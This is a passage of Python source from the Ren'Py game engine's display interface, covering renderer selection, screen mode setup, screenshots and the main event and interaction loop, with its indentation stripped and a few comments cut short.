self.maximum_framerate(initial_maximum_framerate)
self.start_interact = True
self.frame_times = [ ]
self.frame_duration = 1.0 / 60.0
def setup_dpi_scaling(self):
if "RENPY_HIGHDPI" in os.environ:
return float(os.environ["RENPY_HIGHDPI"])
if not renpy.windows:
return 1.0
try:
import ctypes
from ctypes import c_void_p, c_int
ctypes.windll.user32.SetProcessDPIAware()
GetDC = ctypes.windll.user32.GetDC
GetDC.restype = c_void_p
GetDC.argtypes = [ c_void_p ]
ReleaseDC = ctypes.windll.user32.ReleaseDC
ReleaseDC.argtypes = [ c_void_p, c_void_p ]
GetDeviceCaps = ctypes.windll.gdi32.GetDeviceCaps
GetDeviceCaps.restype = c_int
GetDeviceCaps.argtypes = [ c_void_p, c_int ]
LOGPIXELSX = 88
dc = GetDC(None)
rv = GetDeviceCaps(dc, LOGPIXELSX) / 96.0
ReleaseDC(None, dc)
if rv < renpy.config.de_minimus_dpi_scale:
renpy.display.log.write("De minimus DPI scale, was %r", rv)
rv = 1.0
return rv
except:
renpy.display.log.write("Could not determine DPI scale factor:")
renpy.display.log.exception()
return 1.0
def start(self):
if self.started:
return
gc.collect()
if gc.garbage:
gc.garbage[:] = [ ]
renpy.display.render.render_ready()
renpy.display.presplash.end()
renpy.main.log_clock("Interface start")
self.started = True
self.set_mode()
renpy.text.font.load_fonts()
pygame.time.set_timer(PERIODIC, PERIODIC_INTERVAL)
pygame.event.set_grab(False)
if not self.safe_mode:
renpy.display.controller.init()
s = "Total time until interface ready: {}s".format(time.time() - import_time)
renpy.display.log.write(s)
if renpy.android and not renpy.config.log_to_stdout:
print(s)
def post_init(self):
pygame.display.hint("SDL_VIDEO_MINIMIZE_ON_FOCUS_LOSS", "0")
# Needed for Unity.
wmclass = renpy.config.save_directory or os.path.basename(sys.argv[0])
os.environ[b'SDL_VIDEO_X11_WMCLASS'] = wmclass.encode("utf-8")
self.set_window_caption(force=True)
self.set_icon()
if renpy.config.key_repeat is not None:
delay, repeat_delay = renpy.config.key_repeat
pygame.key.set_repeat(int(1000 * delay), int(1000 * repeat_delay))
if android:
android.wakelock(True)
# Block events we don't use.
for i in pygame.event.get_standard_events():
if i in enabled_events:
continue
if i in renpy.config.pygame_events:
continue
pygame.event.set_blocked(i)
def set_icon(self):
icon = renpy.config.window_icon
if icon:
im = renpy.display.scale.image_load_unscaled(
renpy.loader.load(icon),
icon,
)
iw, ih = im.get_size()
imax = max(iw, ih)
square_im = renpy.display.pgrender.surface_unscaled((imax, imax), True)
square_im.blit(im, ( (imax-iw)/2, (imax-ih)/2 ))
im = square_im
pygame.display.set_icon(im)
def set_window_caption(self, force=False):
window_title = renpy.config.window_title
if window_title is None:
window_title = "A Ren'Py Game"
caption = renpy.translation.translate_string(window_title) + renpy.store._window_subtitle
if renpy.exports.get_autoreload():
caption += " - autoreload"
if not force and caption == self.window_caption:
return
self.window_caption = caption
pygame.display.set_caption(caption.encode("utf-8"))
def iconify(self):
pygame.display.iconify()
def get_draw_constructors(self):
renderer = renpy.game.preferences.renderer
renderer = os.environ.get("RENPY_RENDERER", renderer)
if self.safe_mode:
renderer = "sw"
if (renderer == "angle") and (not renpy.windows):
renderer = "auto"
renpy.config.renderer = renderer
if renderer == "auto":
if renpy.windows:
renderers = [ "gl", "angle", "sw" ]
else:
renderers = [ "gl", "sw" ]
if renpy.config.gl2:
renderers = [ "gl2", "egl2" ] + renderers
else:
renderers = [ renderer, "sw" ]
draw_objects = { }
def make_draw(name, mod, cls, *args):
if name not in renderers:
return False
try:
__import__(mod)
module = sys.modules[mod]
draw_class = getattr(module, cls)
draw_objects[name] = draw_class(*args)
return True
except:
renpy.display.log.write("Couldn't import {0} renderer:".format(name))
renpy.display.log.exception()
return False
if renpy.windows:
has_angle = make_draw("angle", "renpy.angle.gldraw", "GLDraw")
else:
has_angle = False
make_draw("gl", "renpy.gl.gldraw", "GLDraw", not has_angle)
make_draw("gl2", "renpy.gl2.gl2draw", "GL2Draw", "gl2", False)
make_draw("gles2", "renpy.gl2.gl2draw", "GL2Draw", "gles2", True)
make_draw("sw", "renpy.display.swdraw", "SWDraw")
rv = [ ]
def append_draw(name):
if name in draw_objects:
rv.append(draw_objects[name])
else:
renpy.display.log.write("Unknown renderer: {0}".format(name))
for i in renderers:
append_draw(i)
return rv
def kill_textures(self):
if renpy.display.draw is not None:
renpy.display.draw.kill_textures()
renpy.display.render.free_memory()
renpy.text.text.layout_cache_clear()
def kill_textures_and_surfaces(self):
self.kill_textures()
renpy.display.im.cache.clear()
renpy.display.module.bo_cache = None
def set_mode(self, physical_size=None):
if renpy.display.draw and renpy.display.draw.info["renderer"] == "sw":
renpy.display.video.movie_stop(clear=False)
renpy.display.render.free_memory()
renpy.text.text.layout_cache_clear()
renpy.display.module.bo_cache = None
if self.display_reset:
pygame.key.stop_text_input()
pygame.key.set_text_input_rect(None)
self.text_rect = None
if renpy.display.draw.info["renderer"] == "angle":
renpy.display.draw.quit()
pygame.display.quit()
self.kill_textures_and_surfaces()
self.old_text_rect = None
self.display_reset = False
virtual_size = (renpy.config.screen_width, renpy.config.screen_height)
if physical_size is None:
if renpy.mobile or renpy.game.preferences.physical_size is None:
physical_size = (None, None)
else:
physical_size = renpy.game.preferences.physical_size
fullscreen = renpy.game.preferences.fullscreen
old_fullscreen = self.fullscreen
self.fullscreen = fullscreen
if os.environ.get('RENPY_DISABLE_FULLSCREEN', False):
fullscreen = False
self.fullscreen = renpy.game.preferences.fullscreen
if renpy.display.draw:
draws = [ renpy.display.draw ]
else:
draws = self.get_draw_constructors()
for draw in draws:
if draw.set_mode(virtual_size, physical_size, fullscreen):
renpy.display.draw = draw
renpy.display.render.models = draw.info.get("models", False)
break
else:
pass
else:
renpy.game.preferences.fullscreen = False
raise Exception("Could not set video mode.")
# Save the video size.
if renpy.config.save_physical_size and not fullscreen and not old_fullscreen:
renpy.game.preferences.physical_size = renpy.display.draw.get_physical_size()
if android:
android.init()
# We need to redraw the (now blank) screen.
self.force_redraw = True
# Assume we have focus until told otherwise.
self.mouse_focused = True
self.keyboard_focused = True
# Assume we're not minimized.
self.minimized = False
self.restart_interaction = True
self.profile_once = False
# Clear the frame times.
self.frame_times = [ ]
def draw_screen(self, root_widget, fullscreen_video, draw):
try:
renpy.display.render.per_frame = True
renpy.display.screen.per_frame()
finally:
renpy.display.render.per_frame = False
surftree = renpy.display.render.render_screen(
root_widget,
renpy.config.screen_width,
renpy.config.screen_height,
)
if draw:
renpy.display.draw.draw_screen(surftree, fullscreen_video)
now = time.time()
self.frame_times.append(now)
while (now - self.frame_times[0]) > renpy.config.performance_window:
self.frame_times.pop(0)
renpy.display.render.mark_sweep()
renpy.display.focus.take_focuses()
self.surftree = surftree
self.fullscreen_video = fullscreen_video
def take_screenshot(self, scale, background=False):
self.clear_screenshot = False
# Do nothing before the first interaction.
if not self.started:
return
if background and not renpy.emscripten:
self.bgscreenshot_event.clear()
self.bgscreenshot_needed = True
if not self.bgscreenshot_event.wait(1.0):
raise Exception("Screenshot timed out.")
surf = self.bgscreenshot_surface
self.bgscreenshot_surface = None
else:
surf = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
surf = renpy.display.scale.smoothscale(surf, scale)
renpy.display.render.mutated_surface(surf)
self.screenshot_surface = surf
sio = cStringIO.StringIO()
renpy.display.module.save_png(surf, sio, 0)
self.screenshot = sio.getvalue()
sio.close()
def check_background_screenshot(self):
if self.bgscreenshot_needed:
self.bgscreenshot_needed = False
self.bgscreenshot_surface = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
self.bgscreenshot_event.set()
def get_screenshot(self):
if not self.started:
self.start()
rv = self.screenshot
if not rv:
self.take_screenshot(
(renpy.config.thumbnail_width, renpy.config.thumbnail_height),
background=(threading.current_thread() is not self.thread),
)
rv = self.screenshot
self.lose_screenshot()
return rv
def lose_screenshot(self):
self.screenshot = None
self.screenshot_surface = None
def save_screenshot(self, filename):
window = renpy.display.draw.screenshot(self.surftree, self.fullscreen_video)
if renpy.config.screenshot_crop:
window = window.subsurface(renpy.config.screenshot_crop)
try:
renpy.display.scale.image_save_unscaled(window, filename)
if renpy.emscripten:
import emscripten
emscripten.run_script(r'''FSDownload('%s')''' % filename)
return True
except:
if renpy.config.debug:
raise
return False
def show_window(self):
if not renpy.store._window:
return
if not renpy.game.preferences.show_empty_window:
return
if renpy.game.context().scene_lists.shown_window:
return
if renpy.config.empty_window:
old_history = renpy.store._history # @UndefinedVariable
renpy.store._history = False
PPP("empty window")
try:
renpy.config.empty_window()
finally:
renpy.store._history = old_history
def do_with(self, trans, paired, clear=False):
if renpy.config.with_callback:
trans = renpy.config.with_callback(trans, paired)
if (not trans) or self.suppress_transition:
self.with_none()
return False
else:
self.set_transition(trans)
return self.interact(trans_pause=True,
suppress_overlay=not renpy.config.overlay_during_with,
mouse='with',
clear=clear)
def with_none(self, overlay=True):
PPP("start of with none")
renpy.game.context().say_attributes = None
# Show the window, if that's necessary.
self.show_window()
if overlay:
self.compute_overlay()
scene_lists = renpy.game.context().scene_lists
for layer, d in self.compute_scene(scene_lists).iteritems():
if layer not in self.transition:
self.old_scene[layer] = d
for i in renpy.config.overlay_layers:
scene_lists.clear(i)
scene_lists.replace_transient()
scene_lists.shown_window = False
if renpy.store._side_image_attributes_reset:
renpy.store._side_image_attributes = None
renpy.store._side_image_attributes_reset = False
def set_transition(self, transition, layer=None, force=False):
if self.suppress_transition and not force:
return
if transition is None:
self.transition.pop(layer, None)
else:
self.transition[layer] = transition
def event_peek(self):
if self.pushed_event:
return self.pushed_event
ev = pygame.event.poll()
if ev.type == pygame.NOEVENT:
self.check_background_screenshot()
renpy.display.draw.event_peek_sleep()
return None
self.pushed_event = ev
return ev
def event_poll(self):
if self.pushed_event:
rv = self.pushed_event
self.pushed_event = None
else:
rv = pygame.event.poll()
self.last_event = rv
return rv
def event_wait(self):
if self.pushed_event:
rv = self.pushed_event
self.pushed_event = None
self.last_event = rv
return rv
self.check_background_screenshot()
ev = pygame.event.wait()
self.last_event = ev
return ev
def compute_overlay(self):
if renpy.store.suppress_overlay:
return
renpy.ui.layer("overlay")
for i in renpy.config.overlay_functions:
i()
if renpy.game.context().scene_lists.shown_window:
for i in renpy.config.window_overlay_functions:
i()
renpy.ui.close()
def compute_scene(self, scene_lists):
rv = { }
for layer in renpy.config.layers + renpy.config.top_layers:
rv[layer] = scene_lists.make_layer(layer, self.layer_properties[layer])
root = renpy.display.layout.MultiBox(layout='fixed')
root.layers = { }
for layer in renpy.config.layers:
root.layers[layer] = rv[layer]
root.add(rv[layer])
rv[None] = root
return rv
def quit_event(self):
if self.screenshot is None:
renpy.exports.take_screenshot()
if self.quit_time > (time.time() - .75):
renpy.exports.quit(save=True)
if self.in_quit_event:
renpy.exports.quit(save=True)
if renpy.config.quit_action is not None:
self.quit_time = time.time()
renpy.exports.movie_stop(only_fullscreen=True)
renpy.store.mouse_visible = True
try:
self.in_quit_event = True
renpy.display.behavior.run(renpy.config.quit_action)
finally:
self.in_quit_event = False
else:
renpy.exports.quit(save=True)
def get_mouse_info(self):
if (renpy.config.mouse_hide_time is not None) and (self.mouse_event_time + renpy.config.mouse_hide_time < renpy.display.core.get_time()):
visible = False
else:
visible = renpy.store.mouse_visible and (not renpy.game.less_mouse)
visible = visible and self.show_mouse and not (renpy.display.video.fullscreen)
if not visible:
return False, 0, 0, None
if not renpy.config.mouse:
return True, 0, 0, None
if not self.mouse_focused:
return False, 0, 0, None
mouse_kind = renpy.display.focus.get_mouse() or self.mouse
if mouse_kind in renpy.config.mouse:
anim = renpy.config.mouse[mouse_kind]
else:
anim = renpy.config.mouse[getattr(renpy.store, 'default_mouse', 'default')]
img, x, y = anim[self.ticks % len(anim)]
rend = renpy.display.im.load_image(img)
tex = rend.children[0][0]
xo = rend.children[0][1]
yo = rend.children[0][2]
return False, x - xo, y - yo, tex
def set_mouse_pos(self, x, y, duration):
self.mouse_move = MouseMove(x, y, duration)
self.force_redraw = True
def drawn_since(self, seconds_ago):
return (get_time() - self.frame_time) <= seconds_ago
def check_suspend(self, ev):
def save():
if renpy.config.save_on_mobile_background and (not renpy.store.main_menu):
renpy.loadsave.save("_reload-1")
renpy.persistent.update(True)
if ev.type == pygame.APP_TERMINATING:
save()
sys.exit(0)
if ev.type != pygame.APP_WILLENTERBACKGROUND:
return False
renpy.audio.audio.pause_all()
if android:
android.wakelock(False)
pygame.time.set_timer(PERIODIC, 0)
pygame.time.set_timer(REDRAW, 0)
pygame.time.set_timer(TIMEEVENT, 0)
save()
if renpy.config.quit_on_mobile_background:
sys.exit(0)
renpy.exports.free_memory()
print("Entered background.")
while True:
ev = pygame.event.wait()
if ev.type == pygame.APP_DIDENTERFOREGROUND:
break
if ev.type == pygame.APP_TERMINATING:
sys.exit(0)
print("Entering foreground.")
# Since we came back to life, we can get rid of the
# auto-reload.
renpy.loadsave.unlink_save("_reload-1")
pygame.time.set_timer(PERIODIC, PERIODIC_INTERVAL)
renpy.audio.audio.unpause_all()
if android:
android.wakelock(True)
# Reset the display so we get the GL context back.
self.display_reset = True
self.restart_interaction = True
return True
def iconified(self):
if self.minimized:
return
self.minimized = True
renpy.display.log.write("The window was minimized.")
def restored(self):
# This is necessary on Windows/DirectX/Angle, as otherwise we get
# a blank screen.
if not self.minimized:
return
self.minimized = False
renpy.display.log.write("The window was restored.")
if renpy.windows:
self.display_reset = True
self.set_mode(self.last_resize)
def enter_context(self):
# Stop ongoing transitions.
self.ongoing_transition.clear()
self.transition_from.clear()
self.transition_time.clear()
def post_time_event(self):
try:
pygame.event.post(self.time_event)
except:
pass
def after_longpress(self):
self.ignore_touch = True
renpy.display.focus.mouse_handler(None, -1, -1, default=False)
def text_event_in_queue(self):
ev = self.event_peek()
if ev is None:
return False
else:
return ev.type in (pygame.TEXTINPUT, pygame.TEXTEDITING)
def update_text_rect(self):
if renpy.store._text_rect is not None: # @UndefinedVariable
self.text_rect = renpy.store._text_rect # @UndefinedVariable
if self.text_rect is not None:
not_shown = pygame.key.has_screen_keyboard_support() and not pygame.key.is_screen_keyboard_shown() # @UndefinedVariable
if self.old_text_rect != self.text_rect:
x, y, w, h = self.text_rect
x0, y0 = renpy.display.draw.untranslate_point(x, y)
x1, y1 = renpy.display.draw.untranslate_point(x + w, y + h)
rect = (x0, y0, x1 - x0, y1 - y0)
pygame.key.set_text_input_rect(rect) # @UndefinedVariable
if not self.old_text_rect or not_shown:
pygame.key.start_text_input() # @UndefinedVariable
else:
if self.old_text_rect:
pygame.key.stop_text_input() # @UndefinedVariable
pygame.key.set_text_input_rect(None) # @UndefinedVariable
self.old_text_rect = self.text_rect
def maximum_framerate(self, t):
if t is None:
self.maximum_framerate_time = 0
else:
self.maximum_framerate_time = max(self.maximum_framerate_time, get_time() + t)
def interact(self, clear=True, suppress_window=False, trans_pause=False, **kwargs):
renpy.plog(1, "start of new interaction")
if not self.started:
self.start()
if self.clear_screenshot:
self.lose_screenshot()
self.clear_screenshot = False
self.trans_pause = trans_pause
# Cancel magic error reporting.
renpy.bootstrap.report_error = None
context = renpy.game.context()
if context.interacting:
raise Exception("Cannot start an interaction in the middle of an interaction, without creating a new context.")
context.interacting = True
# Show a missing window.
if not suppress_window:
self.show_window()
# These things can be done once per interaction.
preloads = self.preloads
self.preloads = [ ]
try:
for i in renpy.config.start_interact_callbacks:
i()
repeat = True
self.start_interact = True
while repeat:
repeat, rv = self.interact_core(preloads=preloads, trans_pause=trans_pause, **kwargs)
self.start_interact = False
return rv
finally:
context.interacting = False
# Clean out transient stuff at the end of an interaction.
if clear:
scene_lists = renpy.game.context().scene_lists
scene_lists.replace_transient()
self.ongoing_transition = { }
self.transition_time = { }
self.transition_from = { }
self.restart_interaction = True
renpy.game.context().mark_seen()
renpy.game.context().scene_lists.shown_window = False
if renpy.game.log is not None:
renpy.game.log.did_interaction = True
if renpy.store._side_image_attributes_reset:
renpy.store._side_image_attributes = None
renpy.store._side_image_attributes_reset = False
def consider_gc(self):
if not renpy.config.manage_gc:
return
count = gc.get_count()
if count[0] >= renpy.config.idle_gc_count:
renpy.plog(2, "before gc")
if count[2] >= renpy.config.gc_thresholds[2]:
gen = 2
elif count[1] >= renpy.config.gc_thresholds[1]:
gen = 1
else:
gen = 0
gc.collect(gen)
if gc.garbage:
renpy.memory.print_garbage(gen)
gc.garbage[:] = [ ]
renpy.plog(2, "after gc")
def idle_frame(self, can_block, expensive):
if expensive:
renpy.plog(1, "start idle_frame (expensive)")
else:
renpy.plog(1, "start idle_frame (inexpensive)")
# We want this to include the GC time, so we don't predict on
start = get_time()
step = 1
while True:
if self.event_peek():
break
if not (can_block and expensive):
if get_time() > (start + .0005):
break
if step == 1:
self.consider_gc()
step += 1
elif step == 2:
renpy.display.draw.ready_one_texture()
step += 1
elif step == 3:
if not self.prediction_coroutine:
step += 1
continue
try:
result = self.prediction_coroutine.send(expensive)
except ValueError:
result = None
if result is None:
self.prediction_coroutine = None
step += 1
elif result is False:
if not expensive:
step += 1
elif step == 4:
if expensive and renpy.emscripten:
renpy.display.im.cache.preload_thread_pass()
step += 1
elif step == 5:
if not self.did_autosave:
renpy.loadsave.autosave()
renpy.persistent.check_update()
self.did_autosave = True
step += 1
else:
break
if expensive:
renpy.plog(1, "end idle_frame (expensive)")
else:
renpy.plog(1, "end idle_frame (inexpensive)")
def interact_core(self,
show_mouse=True,
trans_pause=False,
suppress_overlay=False,
suppress_underlay=False,
mouse='default',
preloads=[],
roll_forward=None,
):
renpy.plog(1, "start interact_core")
suppress_overlay = suppress_overlay or renpy.store.suppress_overlay
self.suppress_overlay = suppress_overlay
self.suppress_underlay = suppress_underlay
self.trans_pause = trans_pause
renpy.display.screen.show_overlay_screens(suppress_overlay)
renpy.display.screen.prepare_screens()
self.roll_forward = roll_forward
self.show_mouse = show_mouse
suppress_transition = renpy.config.skipping or renpy.game.less_updates
self.suppress_transition = False
if suppress_transition:
self.ongoing_transition.clear()
self.transition_from.clear()
self.transition_time.clear()
else:
for k in self.transition:
if k not in self.old_scene:
continue
self.ongoing_transition[k] = self.transition[k]
self.transition_from[k] = self.old_scene[k]._in_current_store()
self.transition_time[k] = None
self.transition.clear()
if trans_pause:
if not self.ongoing_transition:
return False, None
if None not in self.ongoing_transition:
return False, None
if suppress_transition:
return False, None
if not self.old_scene:
return False, None
renpy.translation.check_language()
self.restart_interaction = False
self.mouse = mouse
start_time = get_time()
end_time = start_time
for i in renpy.config.interact_callbacks:
i()
self.set_window_caption()
renpy.display.im.cache.tick()
renpy.text.text.text_tick()
renpy.display.predict.reset()
renpy.display.layout.size_groups.clear()
renpy.display.screen.updated_screens.clear()
pygame.event.clear((pygame.MOUSEMOTION,
PERIODIC,
TIMEEVENT,
REDRAW))
self.post_time_event()
scene_lists = renpy.game.context().scene_lists
scene_lists.remove_hidden()
if not suppress_overlay:
self.compute_overlay()
root_widget = renpy.display.layout.MultiBox(layout='fixed')
root_widget.layers = { }
focus_roots = [ ]
if not suppress_underlay:
for i in renpy.config.underlay:
root_widget.add(i)
focus_roots.append(i)
if roll_forward is not None:
rfw = renpy.display.behavior.RollForward(roll_forward)
root_widget.add(rfw)
focus_roots.append(rfw)
scene = self.compute_scene(scene_lists)
renpy.display.tts.set_root(scene[None])
renpy.plog(1, "computed scene")
for w in scene.itervalues():
try:
renpy.display.predict.displayable(w)
except:
pass
renpy.plog(1, "final predict")
layers_root = renpy.display.layout.MultiBox(layout='fixed')
layers_root.layers = { }
def add_layer(where, layer):
scene_layer = scene[layer]
focus_roots.append(scene_layer)
if (self.ongoing_transition.get(layer, None) and
not suppress_transition):
trans = self.ongoing_transition[layer](
old_widget=self.transition_from[layer],
new_widget=scene_layer)
if not isinstance(trans, Displayable):
raise Exception("Expected transition to be a displayable, not a %r" % trans)
transition_time = self.transition_time.get(layer, None)
where.add(trans, transition_time, transition_time)
where.layers[layer] = trans
else:
where.layers[layer] = scene_layer
where.add(scene_layer)
for layer in renpy.config.layers:
add_layer(layers_root, layer)
if (self.ongoing_transition.get(None, None) and
not suppress_transition):
old_root = renpy.display.layout.MultiBox(layout='fixed')
old_root.layers = { }
for layer in renpy.config.layers:
d = self.transition_from[None].layers[layer]
old_root.layers[layer] = d
old_root.add(d)
trans = self.ongoing_transition[None](
old_widget=old_root,
new_widget=layers_root)
if not isinstance(trans, Displayable):
raise Exception("Expected transition to be a displayable, not a %r" % trans)
trans._show()
transition_time = self.transition_time.get(None, None)
root_widget.add(trans, transition_time, transition_time)
if trans_pause:
if renpy.store._dismiss_pause:
sb = renpy.display.behavior.SayBehavior()
else:
sb = renpy.display.behavior.SayBehavior(dismiss='dismiss_hard_pause')
root_widget.add(sb)
focus_roots.append(sb)
pb = renpy.display.behavior.PauseBehavior(trans.delay)
root_widget.add(pb, transition_time, transition_time)
focus_roots.append(pb)
else:
root_widget.add(layers_root)
for layer in renpy.config.top_layers:
add_layer(root_widget, layer)
for i in renpy.display.emulator.overlay:
root_widget.add(i)
del add_layer
self.prediction_coroutine = renpy.display.predict.prediction_coroutine(root_widget)
self.prediction_coroutine.send(None)
renpy.display.behavior.adj_registered.clear()
renpy.display.video.early_interact()
renpy.display.behavior.input_pre_per_interact()
root_widget.visit_all(lambda i : i.per_interact())
renpy.display.behavior.input_post_per_interact()
self.old_scene = scene
renpy.display.focus.before_interact(focus_roots)
# see it.
if self.restart_interaction:
return True, None
# Redraw the screen.
needs_redraw = True
# First pass through the while loop?
first_pass = True
# We don't yet know when the interaction began.
self.interact_time = None
self.did_autosave = False
old_timeout_time = None
old_redraw_time = None
rv = None
renpy.audio.audio.interact()
_redraw_in = 3600
video_frame_drawn = False
renpy.game.after_rollback = False
# How many frames have we shown so far?
frame = 0
can_block = False
# This try block is used to force cleanup even on termination
# caused by an exception propagating through this function.
try:
while rv is None:
renpy.plog(1, "start of interact while loop")
renpy.execution.not_infinite_loop(10)
# Check for a change in fullscreen preference.
if ((self.fullscreen != renpy.game.preferences.fullscreen) or
self.display_reset or (renpy.display.draw is None)):
self.set_mode()
needs_redraw = True
# Check for autoreload.
if renpy.loader.needs_autoreload:
renpy.loader.needs_autoreload = False
renpy.exports.reload_script()
for i in renpy.config.needs_redraw_callbacks:
if i():
needs_redraw = True
# Redraw the screen.
if (self.force_redraw or
((first_pass or not pygame.event.peek(ALL_EVENTS)) and
renpy.display.draw.should_redraw(needs_redraw, first_pass, can_block))):
self.force_redraw = False
renpy.display.render.process_redraws()
# If we have a movie, start showing it.
fullscreen_video = renpy.display.video.interact()
# Clean out the redraws, if we have to.
# renpy.display.render.kill_redraws()
self.text_rect = None
# Draw the screen.
self.frame_time = get_time()
renpy.audio.audio.advance_time() # Sets the time of all video frames.
self.draw_screen(root_widget, fullscreen_video, (not fullscreen_video) or video_frame_drawn)
if first_pass:
if not self.interact_time:
self.interact_time = max(self.frame_time, get_time() - self.frame_duration)
scene_lists.set_times(self.interact_time)
for k, v in self.transition_time.iteritems():
if v is None:
self.transition_time[k] = self.interact_time
renpy.display.render.adjust_render_cache_times(self.frame_time, self.interact_time)
frame += 1
renpy.config.frames += 1
# If profiling is enabled, report the profile time.
if renpy.config.profile or self.profile_once:
renpy.plog(0, "end frame")
renpy.performance.analyze()
renpy.performance.clear()
renpy.plog(0, "start frame")
self.profile_once = False
if first_pass and self.last_event and self.last_event.type in [ pygame.MOUSEBUTTONDOWN, pygame.MOUSEBUTTONUP, pygame.MOUSEMOTION ]:
x, y = renpy.display.draw.get_mouse_pos()
ev, x, y = renpy.display.emulator.emulator(self.last_event, x, y)
if self.ignore_touch:
x = -1
y = -1
if renpy.android and self.last_event.type == pygame.MOUSEBUTTONUP:
x = -1
y = -1
renpy.display.focus.mouse_handler(None, x, y, default=False)
needs_redraw = False
first_pass = False
pygame.time.set_timer(REDRAW, 0)
pygame.event.clear([REDRAW])
old_redraw_time = None
self.update_text_rect()
renpy.test.testexecution.execute()
# Move the mouse, if necessary.
if self.mouse_move is not None:
if not self.mouse_move.perform():
self.mouse_move = None
# Draw the mouse, if it needs drawing.
renpy.display.draw.update_mouse()
# See if we want to restart the interaction entirely.
if self.restart_interaction:
return True, None
# Determine if we need a redraw. (We want to run these
# functions, so we put them first to prevent short-circuiting.)
if renpy.display.video.frequent():
needs_redraw = True
video_frame_drawn = True
if renpy.display.render.check_redraws():
needs_redraw = True
# How many seconds until we timeout.
_timeout_in = 3600
# Handle the redraw timer.
redraw_time = renpy.display.render.redraw_time()
# We only need to set the REDRAW timer if we can block.
can_block = renpy.display.draw.can_block()
if self.maximum_framerate_time > get_time():
can_block = False
if (redraw_time is not None) and (not needs_redraw) and can_block:
if redraw_time != old_redraw_time:
time_left = redraw_time - get_time()
time_left = min(time_left, 3600)
_redraw_in = time_left
if time_left <= 0:
try:
pygame.event.post(self.redraw_event)
except:
pass
pygame.time.set_timer(REDRAW, 0)
else:
pygame.time.set_timer(REDRAW, max(int(time_left * 1000), 1))
old_redraw_time = redraw_time
else:
_redraw_in = 3600
pygame.time.set_timer(REDRAW, 0)
# Handle the timeout timer.
if not self.timeout_time:
pygame.time.set_timer(TIMEEVENT, 0)
else:
time_left = self.timeout_time - get_time()
time_left = min(time_left, 3600)
_timeout_in = time_left
if time_left <= 0:
self.timeout_time = None
pygame.time.set_timer(TIMEEVENT, 0)
self.post_time_event()
elif self.timeout_time != old_timeout_time:
# Always set to at least 1ms.
pygame.time.set_timer(TIMEEVENT, int(time_left * 1000 + 1))
old_timeout_time = self.timeout_time
if can_block or (frame >= renpy.config.idle_frame):
expensive = not ( needs_redraw or (_redraw_in < .2) or (_timeout_in < .2) or renpy.display.video.playing() )
self.idle_frame(can_block, expensive)
if needs_redraw or (not can_block) or self.mouse_move or renpy.display.video.playing():
renpy.plog(1, "pre peek")
ev = self.event_poll()
renpy.plog(1, "post peek {!r}", ev)
else:
renpy.plog(1, "pre wait")
ev = self.event_wait()
renpy.plog(1, "post wait {!r}", ev)
if ev.type == pygame.NOEVENT:
if can_block and (not needs_redraw) and (not self.prediction_coroutine) and (not self.mouse_move):
pygame.time.wait(1)
continue
# Recognize and ignore AltGr on Windows.
if ev.type == pygame.KEYDOWN:
if ev.key == pygame.K_LCTRL:
ev2 = self.event_peek()
if (ev2 is not None) and (ev2.type == pygame.KEYDOWN):
if ev2.key == pygame.K_RALT:
continue
# Check to see if the OS is asking us to suspend (on Android
# and iOS.)
if self.check_suspend(ev):
continue
# Try to merge an TIMEEVENT with other timeevents.
if ev.type == TIMEEVENT:
old_timeout_time = None
pygame.event.clear([TIMEEVENT])
# On Android, where we have multiple mouse buttons, we can
# merge a mouse down and mouse up event with its successor. This
# prevents us from getting overwhelmed with too many events on
# a multitouch screen.
if android and (ev.type == pygame.MOUSEBUTTONDOWN or ev.type == pygame.MOUSEBUTTONUP):
pygame.event.clear(ev.type)
# Handle redraw timeouts.
if ev.type == REDRAW:
pygame.event.clear([REDRAW])
old_redraw_time = None
continue
# Handle periodic events. This includes updating the mouse timers (and through the loop,
# the mouse itself), and the audio system periodic calls.
if ev.type == PERIODIC:
events = 1 + len(pygame.event.get([PERIODIC]))
self.ticks += events
for i in renpy.config.periodic_callbacks:
i()
renpy.audio.audio.periodic()
renpy.display.tts.periodic()
continue
# Handle quit specially for now.
if ev.type == pygame.QUIT:
self.quit_event()
continue
# Ignore KEY-events while text is being edited (usually with an IME).
if ev.type == pygame.TEXTEDITING:
if ev.text:
self.text_editing = ev
else:
self.text_editing = None
elif ev.type == pygame.TEXTINPUT:
self.text_editing = None
elif self.text_editing and ev.type in [ pygame.KEYDOWN, pygame.KEYUP ]:
continue
if ev.type == pygame.VIDEOEXPOSE:
# Needed to force the display to redraw after expose in
# the software renderer.
renpy.game.interface.full_redraw = True
renpy.game.interface.force_redraw = True
if isinstance(renpy.display.draw, renpy.display.swdraw.SWDraw):
renpy.display.draw.full_redraw = True
continue
# Handle videoresize.
if ev.type == pygame.VIDEORESIZE:
evs = pygame.event.get([pygame.VIDEORESIZE])
if len(evs):
ev = evs[-1]
# We seem to get a spurious event like this when leaving
# fullscreen mode on windows.
if ev.w < 256 or ev.h < 256:
continue
size = (ev.w // self.dpi_scale, ev.h // self.dpi_scale)
# Refresh fullscreen status (e.g. user pressed Esc. in browser)
main_window = pygame.display.get_window()
self.fullscreen = main_window is not None and bool(main_window.get_window_flags() & (pygame.WINDOW_FULLSCREEN_DESKTOP|pygame.WINDOW_FULLSCREEN))
renpy.game.preferences.fullscreen = self.fullscreen
if pygame.display.get_surface().get_size() != ev.size:
self.set_mode(size)
if not self.fullscreen:
self.last_resize = size
continue
# If we're ignoring touch events, and get a mouse up, stop
if self.ignore_touch and \
ev.type == pygame.MOUSEBUTTONUP and \
ev.button == 1:
self.ignore_touch = False
continue
if ev.type == pygame.MOUSEMOTION:
evs = pygame.event.get([pygame.MOUSEMOTION])
if len(evs):
ev = evs[-1]
if renpy.windows:
self.mouse_focused = True
if ev.type == pygame.MOUSEMOTION or \
ev.type == pygame.MOUSEBUTTONDOWN or \
ev.type == pygame.MOUSEBUTTONUP:
self.mouse_event_time = renpy.display.core.get_time()
if self.ignore_touch:
renpy.display.focus.mouse_handler(None, -1, -1, default=False)
if ev.type == pygame.ACTIVEEVENT:
if ev.state & 1:
if not ev.gain:
renpy.display.focus.clear_focus()
self.mouse_focused = ev.gain
if ev.state & 2:
self.keyboard_focused = ev.gain
if ev.state & 4:
if ev.gain:
self.restored()
else:
self.iconified()
pygame.key.set_mods(0)
x, y = renpy.display.draw.mouse_event(ev)
x, y = renpy.test.testmouse.get_mouse_pos(x, y)
ev, x, y = renpy.display.emulator.emulator(ev, x, y)
if ev is None:
continue
if not self.mouse_focused or self.ignore_touch:
x = -1
y = -1
ev = renpy.display.controller.event(ev)
if not ev:
continue
